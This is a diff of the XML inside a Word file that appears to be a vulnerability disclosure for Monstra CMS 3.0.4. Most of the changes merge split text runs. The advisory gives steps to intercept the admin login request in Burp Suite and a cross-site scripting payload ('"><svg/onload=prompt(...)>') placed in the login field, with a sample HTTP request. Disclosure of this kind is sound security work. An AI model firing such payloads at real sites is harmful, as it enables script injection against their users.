-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="227" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Vendor of Product:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="1" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t>Monstra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CMS 3.0.4</w:t>
+        <w:t>Monstra CMS 3.0.4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -990,8 +856,8 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="page3"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkStart w:id="1" w:name="page3"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1172,7 +1038,6 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1181,9 +1046,8 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>1)go</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">1)go to the following link </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1192,7 +1056,16 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> to the following link </w:t>
+        <w:t>http://localhost/monstra/admin/index.php?id=pages</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1202,7 +1075,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>http://localhost/monstra/admin/index.php?id=pages</w:t>
+        <w:t>2)enter your username and password</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1221,7 +1094,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t>3)capture the post request in burp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1231,7 +1104,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>)enter your username and password</w:t>
+        <w:t>suite</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1250,9 +1123,8 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">3)capture the post request in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>4)In the body of the post request there would be a field “login=”</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1261,7 +1133,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>burp</w:t>
+        <w:t xml:space="preserve"> .Set this field to</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1271,9 +1143,8 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>suite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> the following payload:- "&gt;&lt;svg/onload=prompt(8)&gt;</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1291,103 +1162,8 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>4)In the body of the post request there would be a field “login=”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .Set this field to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the following payload:- "&gt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>svg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>onload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>=prompt(8)&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5)Forward the request and turn off the intercept in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>burpsuite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>5)Forward the request and turn off the intercept in burpsuite</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1641,47 +1417,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>POST /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>monstra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>/admin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>index.php?id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>=pages HTTP/1.1</w:t>
+        <w:t>POST /monstra/admin/index.php?id=pages HTTP/1.1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1711,21 +1447,11 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:br/>
-        <w:t>Accept: text/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>html,application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
+        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Emphasis"/>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
           <w:color w:val="24292E"/>
           <w:sz w:val="21"/>
@@ -1733,56 +1459,6 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>xhtml+xml,application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>xml;q</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>=0.9,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Emphasis"/>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1800,27 +1476,7 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">Accept-Language: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>en-US,en;q</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>=0.5</w:t>
+        <w:t>Accept-Language: en-US,en;q=0.5</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1830,27 +1486,7 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">Accept-Encoding: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>gzip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>, deflate</w:t>
+        <w:t>Accept-Encoding: gzip, deflate</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1860,26 +1496,7 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Referer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>: </w:t>
+        <w:t>Referer: </w:t>
       </w:r>
       <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
@@ -1921,19 +1538,8 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:br/>
-        <w:t>Content-Type: application/x-www-form-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>urlencoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
@@ -1957,25 +1563,14 @@
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>login</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="24292E"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>="&gt;&lt;svg/onload=prompt(1337)&gt;&amp;password=xxxxxx&amp;login_submit=Log+In</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="24292E"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>login="&gt;&lt;svg/onload=prompt(1337)&gt;&amp;password=xxxxxx&amp;login_submit=Log+In</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2206,7 +1801,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:pict>
+        <w:pict w14:anchorId="325DFF0E">
           <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
             <v:stroke joinstyle="miter"/>
             <v:formulas>
@@ -2226,8 +1821,8 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:450.75pt;height:253.5pt">
-            <v:imagedata r:id="rId6" o:title="Screenshot (258)"/>
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:450.75pt;height:239.25pt">
+            <v:imagedata r:id="rId6" o:title="Screenshot (258)" cropbottom="3684f"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -2271,9 +1866,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
         </w:rPr>
-        <w:pict>
-          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:450.75pt;height:253.5pt">
-            <v:imagedata r:id="rId7" o:title="Screenshot (259)"/>
+        <w:pict w14:anchorId="5B0E8178">
+          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:450.75pt;height:177.75pt">
+            <v:imagedata r:id="rId7" o:title="Screenshot (259)" croptop="7950f" cropbottom="11634f"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -2373,25 +1968,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>https://www.owasp.org/index.php/Cross-site_Scripting</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>_(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>XSS)</w:t>
+        <w:t>https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2514,51 +2091,15 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>Author: Nikhil Sahoo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Ipsita</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Subhadarshan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Sahoo</w:t>
+        <w:t>Author: Nikhil Saho</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>o</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2587,10 +2128,7 @@
         <w:t>https://www.linkedin.com/in/nikhil-sahoo-87204b106/</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
-    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -2602,7 +2140,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -2618,7 +2156,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="377">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -2766,11 +2304,8 @@
     <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
@@ -2990,6 +2525,12 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link Error" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
